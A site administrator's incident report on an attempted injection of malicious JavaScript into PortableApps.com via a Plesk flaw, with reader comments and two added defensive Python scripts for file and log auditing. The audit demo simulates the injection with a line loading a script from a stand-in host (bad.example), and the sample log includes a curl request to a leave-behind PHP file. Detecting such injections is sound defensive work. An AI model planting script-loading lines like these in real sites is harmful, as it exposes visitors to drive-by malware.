Earlier today, a 'possible malware' warning appeared about PortableApps.com within Norton 360, Mozilla Firefox, Google search results and similar products. This was due to an attempted hack on PortableApps.com via a Plesk exploit (initially believed to be a Drupal exploit; see the February 11th update below). No PortableApps.com portable apps, databases, logins, user data, project data or security credentials were compromised. A full security audit was undertaken in the hours after the attempt to ensure nothing else was affected (it wasn't), and additional security measures were implemented to ensure everything keeps on working. The full details follow...
Drupal Vulnerability
Drupal, the content management system that runs PortableApps.com, released a security update yesterday to deal with this issue. Unfortunately, we did not receive the standard security update notification from Drupal.org to update the site. Compounding the issue, it seems one of the automated scanners that scans websites for this vulnerability was updated to include it before many Drupal sites had been updated.
Update on February 11th: It wasn't Drupal...
The Attempted Exploit (a bit technical)
The exploit allows a third party, under certain circumstances, to include Javascript from another site in a website's pages (referred to as Cross Site Scripting or XSS), potentially for nefarious purposes. The automated attack permitted a portion of Javascript code to be included on PortableApps.com via an unused file within our Drupal theme. The attack was not fully successful, however, as the code was incomplete. The code the attack attempted to insert is what's known as a Blackhole toolkit, a set of Javascript commands designed to exploit known vulnerabilities in the visitor's browser. As long as a user has an up to date browser, operating system and plugins, they would be immune even if a Blackhole toolkit was able to execute on their system. The code did, however, set up a potential Javascript redirection to a 3rd-party server that appears to have been compromised earlier in the day. This server appears to have been removed from service at around the same time or soon after the redirect was set up. While we cannot fully rule out the possibility that a small number of users may have been served a Javascript file from that server, we have no reports of any users experiencing any issues.
The Detection and Warnings
Although the exploit did not fully succeed on the PortableApps.com server, enough of the Javascript code and redirect was present to trigger a detection of the file through Google and Norton 360's automated scanners. This detection accounts for any warnings you may have seen when accessing the site via Mozilla Firefox today or through Google's search results.
Patching and Proactive Security Measures
As soon as the potential security vulnerability was known, the Drupal patch was applied and verified and a full security audit was begun. All files updated within the last 24 hours were verified and the one affected file was removed. We also elected to take extra time and reset all remote login criteria and database access passwords. Although no unauthorized access to any of these systems had been made, we thought it best to err on the side of caution and be absolutely sure that no further issues occur. We then fully cleared the website cache and had it rebuild all 26,000+ pages of PortableApps.com along with all associated files. Finally, full virus scans have been run on all our machines and all have come back clean. If you'd like to err on the side of being extra-cautious, scanning your machine and drive for badware is always a good idea.
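The audit steps above (checking every file touched in the last 24 hours and removing the injected theme file) and the injection described in the exploit section can be turned into a repeatable script. The following is an added example written for this page, not PortableApps.com's or Rackspace's own tooling; the directory layout (themes/ and files/ as static-only directories), the allowed-host list, the temporary web root and the sample file contents are all constructed assumptions.

```python
"""Post-incident web-root audit (added example; not the site's own tooling).

Three checks an admin can run after an attempted file injection like the one
described above:
  1. every file modified within the last N hours,
  2. every file whose SHA-256 differs from a baseline manifest recorded while
     the site was known clean (plus files added or removed since),
  3. files that do not belong in a static theme directory: PHP files (a
     possible leave-behind) and JavaScript that references an external host.
Directory names, allowed hosts and sample contents are constructed for the demo.
"""
import hashlib
import os
import re
import tempfile
import time

# Assumption: paths containing these segments hold only CSS/JS/images, never PHP.
STATIC_DIR_MARKERS = ("/themes/", "/files/")
# Matches src= attributes/assignments and location[.href]= assignments that
# point at an absolute or protocol-relative URL; group 2 is the host name.
EXTERNAL_REF = re.compile(
    r"""(?:src\s*=\s*|location(?:\.href)?\s*=\s*)['"]?(https?:)?//([a-z0-9.-]+)""", re.I)


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Relative path -> SHA-256 for every regular file under root."""
    manifest = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def recently_modified(root, hours):
    """Relative paths of files whose mtime falls within the last `hours`."""
    cutoff = time.time() - hours * 3600
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            if os.path.getmtime(full) >= cutoff:
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def diff_manifest(baseline, current):
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def suspicious_in_static(root, allowed_hosts):
    """PHP under a static dir, or JS referencing a host outside allowed_hosts."""
    findings = set()
    for dirpath, _, names in os.walk(root):
        rel_dir = "/" + os.path.relpath(dirpath, root).replace(os.sep, "/") + "/"
        if not any(marker in rel_dir for marker in STATIC_DIR_MARKERS):
            continue
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if name.lower().endswith((".php", ".phtml", ".php5")):
                findings.add((rel, "php-in-static-dir"))
            elif name.lower().endswith(".js"):
                with open(full, "r", errors="replace") as f:
                    for m in EXTERNAL_REF.finditer(f.read()):
                        host = m.group(2).lower()
                        if host not in allowed_hosts:
                            findings.add((rel, "external-reference:" + host))
    return sorted(findings)


def demo():
    """Constructed web root: snapshot a clean tree, simulate the injection, audit."""
    root = tempfile.mkdtemp(prefix="webroot-")

    def put(rel, content, age_hours):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as f:
            f.write(content)
        ts = time.time() - age_hours * 3600
        os.utime(full, (ts, ts))

    # Known-clean state, a week old, captured as the baseline.
    put("index.php", "<?php require 'core/bootstrap.php';\n", 168)
    put("themes/site/js/menu.js", "document.getElementById('nav').hidden = false;\n", 168)
    put("themes/site/js/unused.js", "// leftover theme script, not loaded anywhere\n", 168)
    put("themes/site/css/style.css", "body{margin:0}\n", 168)
    baseline = build_manifest(root)
    # Simulated attack two hours ago: the unused theme script now loads a script
    # from an outside host, and an inert stand-in for a PHP leave-behind appears.
    put("themes/site/js/unused.js",
        "var s=document.createElement('script');s.src='http://bad.example/k.js';\n", 2)
    put("themes/site/js/upd.php", "<?php /* constructed stand-in for a leave-behind */\n", 2)
    return {
        "recent": recently_modified(root, 24),
        "diff": diff_manifest(baseline, build_manifest(root)),
        "suspicious": suspicious_in_static(root, allowed_hosts={"portableapps.com"}),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(check, result)
```

The baseline manifest is the piece worth keeping around permanently: a mtime-based sweep only catches what changed recently and can be fooled by a touched timestamp, while a hash diff against a snapshot taken on a known-clean deployment shows exactly which files were altered, added or removed regardless of what the timestamps say.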
Awaiting Warning Removal - (UPDATE: Warnings Removed)
The malware warning systems are much quicker to flag a potential security risk than to register that a server has been confirmed clean, so although the site did not host any malware and is confirmed clean, the Google/Mozilla warning system was still showing the site as a possible security issue several hours later. Google was notified that the site was confirmed clean at 4pm NY time today. Symantec has already removed its warning from Norton 360 and shows no issues now. Bing has also removed any warnings.
UPDATE FEB 4 @ 1AM NY TIME: Google has removed PortableApps.com from its potentially suspicious sites list. Mozilla Firefox users no longer see a warning. Search results in Google still show a warning but this will hopefully be resolved shortly. The Google search result warnings were removed a few hours later.
Google, Feb 4 @ 1AM: "A review for this site has finished. The site was found clean. The badware warnings from web search are being removed. Please note that it can take some time for this change to propagate."
Next Steps
We've added additional policies to ensure that Drupal security vulnerabilities are addressed much sooner after being announced so we can beat the automated tools to the punch on future vulnerabilities. We've also added additional monitoring to keep an eye on potential threats as they arise as well as implementing faster notifications of admins when this occurs. Finally, we have added in additional paid antivirus scanning and paid automated vulnerability scanning by an industry-leading external party.
On a personal note, I'd like to apologize for any inconvenience or scare this has caused any of our developers and users. We take every precaution to ensure the safety of our apps, data and website, so it's always a bit frightening when something like this occurs, even when the attempted intrusion doesn't fully succeed and apparently hasn't negatively impacted any of our users. We will continue to give our all to ensure you have access to the best, most-secure, most-consistent and fully legal set of portable software in the world for years to come.
Kind Regards,
John
Comments
Why in the world would somebody attack PortableApps.com?
One of our Facebook followers asked "Why in the world would somebody attack PortableApps.com?" I thought the answer would be of interest to folks on here as well.
"It was an automated attack. There are scripting tools that just scan websites using common content management and forum systems (Drupal, Joomla, WordPress, etc) and automatically report back the vulnerability and let the attacker insert code (in this case, an attempt to redirect a Javascript file to a 3rd party site in India on a server that was compromised). Folks basically sit running these tools on all websites, especially the most popular sites. As PortableApps.com is in the top 5,000 sites in the world, we get auto-scanned a lot. And as Drupal has been getting more popular as a CMS, the hacking tools have gotten better at implementing exploits for it more quickly."
The Reason why they attack any high traffic site
The main reason why these "folks" attack high traffic sites is because if they are successful in changing just a bit of code on the website to redirect visitors to another page, or to an automatic download of a virus, they are able to make a lot of money unethically.
The benefit of open source content management frameworks such as Drupal (used by PortableApps.com) and WordPress is that many developers around the world try and find security holes and, when found, make it possible for people to update and fix those holes.
Unfortunately the attackers are more motivated to attack (since there is money in it for them) than the website owners are to update (since it could mean incompatibilities with plugins etc).
I was shocked to see that PortableApps was labeled as a Malware site, and it is sad that Google / StopMalware doesn't allow speedy rescanning to confirm you are clean.
It also seems Google places websites into "groups" or "neighbourhoods" and if enough websites in that neighbourhood are branded, then the lot gets branded.
Well, I hope the malware warnings get corrected soon, as PortableApps.com provides an invaluable service! (PS: Nearly all Mac apps are already portable, so someone has to help the Windows users..)
Thanks again for the great website and service over the years!
The Reason why they attack any high traffic site
(PS: Nearly all Mac Apps are already Portable, so someone has to help the Windows users..)
You are just kidding right?
Warnings?
I went on a downloading binge yesterday and today and haven't seen any warnings and at all. Thanks for the information, I'll scan all my apps just to be sure.
I will say: thumbs up for the
I will say: thumbs up for the quick reaction on this irritating problem. Also my compliments for communicating this with the users of the site.
Most sites and companies hope that nobody finds out what happened and keep their mouths shut.
Responsible Response
It is true that many companies would hope to sweep something like this under the rug, especially since it doesn't appear to have affected anyone. In my opinion, the responsible response is to be up-front and try to make things as clear as possible to both the techies and non-techies. Brushing it under the rug and just saying 'everything was fine' without explaining what occurred to the best of our knowledge, wouldn't be fair to our community's past, present or future members. As one of the world's largest open source projects, it only makes sense to be open and honest about it.
Thank you.
Well done.
Agreed
I agree John. Job well done. I find your response to the entire situation very refreshing. It's sad that it is not the norm in this day and age.
ummm
Not sure why but 10:13 NY (Maine) time I attempted to access PA Tracker page via my Google bookmarks and I still get the Firefox Warning Page
Updated Noon this issue resolved
Intense
I didn't go online yesterday, so I missed the whole shebang, but I'm glad the issue got resolved quickly.
Couldn't believe...
...when I came to your site yesterday, just as I wanted to dload those fabulous portable apps that I had just discovered on the web the day before! But life was nice again this morning, to see your website being recovered and clean again!
Thanks a lot and keep on a-p-p-i-n-g!!
Regards
Dave
Welcome back
Welcome back
I wasn't able to visit your website for awhile, I was warned it's a risk to do so.
How can we be completely confident and certain that all files are clean?
I don't know how you can, but
I don't know how you can, but I am. :evil:
Can't post
I tried to reply to post 30976, using links to various posts within PortableApps.com, and I got a message from Drupal saying "A little bit of server maintence is under way."
But the URL bar says portableappsDOTcomSLASHspamSLASHdenied.
What gives?
Spam Filter
We're experimenting with re-enabling bits of the spam filtering system with some new settings this weekend. You had a post that was marked as spam.
For the record
As we discussed in the chat room, that post was actually a normal post that the filter mistakenly marked as spam (you estimated that at the time, the filter was flagging 40% of posts mistakenly). It was actually a post meant to help a noob. I don't want people to think that I post anything bad.
I Went To...
https://portableapps.com/spam/denied And It Said
A little bit of server maintence is under way. You can download apps directly from the PortableApps.com Platform 10.0.1.
Have some tea and we'll be back before you know it...
(There were some biscuits around here somewhere, too, but we think one of our hard-working developers ate them all.)
And It Was Quite Funny.
Thanks for clarifying this
Thanks for clarifying this issue John.
Though I do have to say I like the old font style of the menu bar better than the new one.
You can't please everyone
You can't please everyone
Thank you!
Thanks for the post. I didn't check this site yesterday for updates so I guess I 'missed' all the fun.
Clear communication to users on what happened and what the site is doing to rectify the situation is always the way to go. I wish more sites (*cough* Sony Playstation Network *cough*) would have done this in the past. Web sites with people that 'get it' running them always set the bar high in this area (PortableApps, Zappos, etc).
Opera Malware Warning Feb 9
Just to let you know, for the first time, I just got a Malware warning about this site a few minutes ago. In fact, it showed on my portable Opera speed dial. When I clicked on the speed dial, it showed the warning that the site has been reported for distributing malware. I know that's not true so I came here anyway, but thought you should know.
Odd
I took the site offline to double-check things. The site scanner and all blacklists show as clean. I'm running deeper scans and monitoring now to be sure.
Opera's Malware Blacklist provider
Contact support[at]search[dot]yandex[dot]com
http://www.opera.com/support/kb/view/963/
Geez
I just thought you were having afternoon tea.......
Warning Removed
The warning has been removed and the site has scanned clean with Opera's warning provider. We're investigating further on the cause. I'll post here when I have more information.
Bullguard reporting download as infected
I have been happily using this program for sometime and went to update it today. Bullguard has just stopped an infected download.
Virus Name:Gen.Trojan.Heur.FU.dyW@aeT8pei
Infected Object: kent.dl.source.net/project/portableapps/PortabbleApps.com%20Platform/Additional%20Versions/PortableApps.com_Platform_Setup_10.0.1exe
Is this because of the recent attack or something else?
False positive
That's a generic heuristics-based false positive. They're quite common, unfortunately.
I know here this website is
I know here this website is safe... http://www.mywot.com/en/scorecard/portableapps.com
Also from McAfee SiteAdvisor... http://www.siteadvisor.com/sites/portableapps.com
Update Feb 11, 2012 - It Wasn't Drupal
After a more thorough investigation with our engineering team at Rackspace, we've determined a bit more about the hack. First off, it was not due to the Drupal exploit as we had thought. It was due to a vulnerability within Plesk, an administrative interface used to manage the server.
As we have a server running an older version of Red Hat Enterprise Linux (RHEL), we're not running the current version of Plesk but an older one. Unlike the other server packages within RHEL such as PHP, MySQL and Apache, Plesk is not automatically updated. It is updated upon request for new features or whenever Plesk's publisher notifies users that there is a security vulnerability. Unfortunately, there was a vulnerability, and a patch for it, that Plesk did not notify Rackspace about. This exploit affected numerous websites, including some belonging to large companies.
The exploit was in Plesk's ability to change the contact name on a given domain which, when exploited properly, gave a 3rd party limited access to Plesk's file manager. This is what the attacker used to place the malicious Javascript file in a location that would cause Drupal to cache it along with our standard files. The attacker also used this exploit to place a PHP file allowing them to re-place the Javascript file at a later date without needing to use the Plesk exploit.
This past Friday, the attacker put the Javascript file back, again pointing to a compromised international server that was taken down quite quickly. The attack was found much more quickly this time (before any of the major vulnerability scanners even found it), which allowed us to determine the root cause and remove the affected Javascript file as well as the leave-behind code used to re-place it. Plesk was also patched to fix the exploit. Just to be absolutely sure, we set up a firewall to wall off Plesk from everyone except Rackspace and our NYC office.
We spent additional time Friday reviewing all the access logs for Plesk, Drupal and Apache and no additional files were accessed or altered by the 3rd party. The PortableApps.com portable apps, user details, website data, administrative logins, database passwords, etc were all uncompromised again. So your portable software and personal information are still safe.
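The log review described above (confirming that the third party touched nothing beyond the two files) is the kind of work that benefits from a small parser rather than scrolling through grep output. The following is an added example written for this page, not PortableApps.com's or Rackspace's own script. It reads Apache combined-format lines; the sample lines, client addresses, theme path, known-bad path and the list of legitimate form endpoints are all constructed for the demo.

```python
"""Access-log triage after a theme-file injection (added example, not the
site's own tooling). Works on Apache combined-format lines and flags:
  * any request for a PHP file under a theme directory (theme directories
    should serve only static assets, so such a hit points at a leave-behind),
  * POST/PUT requests to paths outside an allow-list of known form endpoints,
  * every client that touched a known-bad path, with timestamps, so the rest
    of that client's activity can be pulled from the full logs.
All sample lines, addresses and paths below are constructed for the demo.
"""
import re
from collections import defaultdict

# Apache "combined" format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Constructed sample log: one ordinary visitor, one client hitting the
# leave-behind path, and one line that is not in combined format at all.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Feb/2012:14:02:11 -0500] "GET /themes/site/js/unused.js HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [03/Feb/2012:14:03:40 -0500] "POST /themes/site/js/upd.php?x=1 HTTP/1.1" 200 14 "-" "curl/7.19"
198.51.100.9 - - [03/Feb/2012:14:03:41 -0500] "GET /themes/site/js/unused.js HTTP/1.1" 200 388 "-" "curl/7.19"
203.0.113.7 - - [03/Feb/2012:14:05:02 -0500] "POST /user/login HTTP/1.1" 302 0 "https://example.test/user" "Mozilla/5.0"
203.0.113.7 - - [03/Feb/2012:14:05:03 -0500] "GET /themes/site/css/style.css HTTP/1.1" 200 90 "-" "Mozilla/5.0"
this line is garbage
"""


def parse_line(line):
    """Return a dict of fields, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def triage(lines, theme_prefixes, write_allowlist, bad_paths):
    findings = []
    actors = defaultdict(list)  # client ip -> [(timestamp, method, path)]
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            # Unparseable lines are reported, never silently skipped.
            findings.append(("unparseable", raw.strip()))
            continue
        ip, method, path = rec["ip"], rec["method"], rec["path"]
        in_theme = any(path.startswith(p) for p in theme_prefixes)
        if in_theme and path.lower().endswith((".php", ".phtml")):
            findings.append(("php-under-theme", ip, path, rec["status"]))
        if method in ("POST", "PUT") and path not in write_allowlist:
            findings.append(("unexpected-write", ip, method, path, rec["status"]))
        if path in bad_paths:
            actors[ip].append((rec["ts"], method, path))
    return findings, dict(actors)


def demo():
    """Run the triage over the constructed sample with assumed site settings."""
    return triage(
        SAMPLE_LOG.splitlines(),
        theme_prefixes=("/themes/",),
        write_allowlist={"/user/login", "/user/register", "/search/node"},
        bad_paths={"/themes/site/js/upd.php"},
    )


if __name__ == "__main__":
    findings, actors = demo()
    for f in findings:
        print("FINDING", f)
    for ip, hits in actors.items():
        print("ACTOR", ip, hits)
```

The "actors" output is the part to follow up on: once every client that requested the leave-behind path is known, all of that client's other requests (and the matching Plesk and Drupal watchdog entries for the same window) can be reviewed to answer the question the update above asks, whether any further file was accessed or altered.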
Thank you again for bearing with us during this incident and week-long investigation. We look forward to providing you with awesome portable software for years to come.
Kind Regards,
John
Thanks for the update
I am glad nothing serious happened and you got it fixed so quickly!